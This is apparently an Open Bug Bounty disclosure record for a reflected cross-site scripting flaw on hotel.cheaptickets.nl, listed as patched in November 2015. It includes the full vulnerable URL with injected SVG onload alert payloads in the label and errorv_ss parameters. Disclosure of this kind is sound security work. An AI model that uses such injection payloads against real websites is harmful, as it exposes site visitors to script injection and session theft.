hotel.cheaptickets.nl XSS vulnerability

2015-11-01T10:08:00
ID OBB:99043
Type openbugbounty
Reporter retr0
Modified 2015-11-01T10:11:00

Description

Vulnerable URL:
http://hotel.cheaptickets.nl/index.en-gb.html?label=lol%22--%3E%3Csvg%20onload=alert%28%27XSSPOSED%27%29%3E-chp-home-menu-mob;sid=f77020a931cc1c9c7dbf450177c2fff4;dcid=4;bb_ltbi=0;sb_price_type=total&;errorc_searchstring_not_found=ss;errorv_offset_unavail=1;errorv_no_rooms=1;errorv_ssb=empty;errorv_label_click=undef;errorv_si=ai%2Cco%2Cci%2Cre%2Cdi;errorv_ss=%22--%3E%3Csvg%20onload%3Dalert%281%29%3E;errorv_idf=1;errorv_error_url=http%3A%2F%2Fhotel.cheaptickets.nl%2Findex.en-gb.html%3Flabel%3Dtravix-chp-home-menu-mob%3Bsid%3Df77020a931cc1c9c7dbf450177c2fff4%3Bdcid%3D4%3Bbb_ltbi%3D0%3Bsb_price_type%3Dtotal%26%3B;errorv_review_score_group=empty;errorv_src=index;errorv_room1=A%2CA;errorv_class_interval=1;errorv_csflt={};errorv_sb_price_type=total;errorv_group_adults=2

Details:

Description| Value
---|---
Patched:| Yes, on 22.11.2015
Latest check for patch:| 22.11.2015 17:32 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| Unknown / Not calculated
Google PageRank:| 0
VIP website status:| No
hotel.cheaptickets.nl SSL connection grade:| A-

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 1 November, 2015 10:08 GMT
Vulnerability existence verified and confirmed| 1 November, 2015 10:11 GMT